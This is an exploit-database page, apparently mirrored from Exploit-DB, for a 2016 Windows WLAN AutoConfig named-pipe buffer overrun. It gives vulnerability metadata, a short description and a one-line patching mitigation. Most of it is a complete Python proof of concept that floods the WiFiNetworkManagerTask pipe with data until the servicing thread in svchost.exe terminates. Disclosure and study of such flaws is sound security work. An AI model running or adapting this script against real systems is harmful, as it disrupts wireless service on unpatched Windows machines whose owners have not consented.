header-logo
Suggest Exploit
vendor:
Windows WLAN AutoConfig
by:
Jeremy Brown
7,8
CVSS
HIGH
Buffer Overrun
119
CWE
Product Name: Windows WLAN AutoConfig
Affected Version From: Windows 10 x86/x64 BUILD 10.0.14393
Affected Version To: Windows Server 2012 R2 x64
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 10 x86/x64, Windows Server 2012 R2 x64
2016

Windows WLAN AutoConfig Named Pipe POC

This exploit is a proof-of-concept for a buffer overrun vulnerability in Windows WLAN AutoConfig Named Pipe. The vulnerability is caused by a stack buffer overrun in the svchost.exe process, which can be triggered by writing a large amount of data to the WiFiNetworkManagerTask pipe. This exploit will not kill the Wlansvc service, but the thread servicing the pipe will terminate.

Mitigation:

Ensure that all Windows systems are up-to-date with the latest security patches.
Source

Exploit-DB raw data:

#!/usr/bin/python
# wlanautoconfig-poc.py
#
# Windows WLAN AutoConfig Named Pipe POC
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2016
#
# >	wifinetworkmanager.dll!__FatalError(char const *,unsigned # long,char const *, ...)
#	AsyncPipe::ReadCompletedCallback(void)
#	AsyncPipe::Dispatch(int,void *,void *, ...)
#	Synchronizer::EnqueueEvent(...)
#	AsyncPipe::ReadCompletedStatic(...)
#
# --> STATUS_STACK_BUFFER_OVERRUN @ svchost.exe
#
# Tested:
#
# Windows 10 x86/x64 BUILD 10.0.14393 (vulnerable)
# Windows Server 2012 R2 x64 (not vulnerable, service doesn't create pipe)
#
# Dependencies:
#
# pip install pypiwin32
#
# Notes:
#
# This won't kill Wlansvc service, but the thread servicing the pipe will terminate
#

import win32file
import pywintypes
import msvcrt

BUF_SIZE = 4096
PIPE_NAME = r'\\.\pipe\WiFiNetworkManagerTask'

def main():
    try:
        handle = win32file.CreateFile(PIPE_NAME, win32file.GENERIC_WRITE, 0, None, win32file.OPEN_EXISTING, 0, None)
    except Exception:
        print("Error: CreateFile() failed\n")
        return

    fd = msvcrt.open_osfhandle(handle, 0)

    if(fd < 0):
        print("Error: open_osfhandle() failed\n")
        return

    buf = bytearray(b'\x42' * BUF_SIZE)

    # exact number here could vary, keeping it simple
    while True:
        win32file.WriteFile(handle, buf)


if __name__ == "__main__":
    main()

Navigation

Suggest Exploit

Services By CQR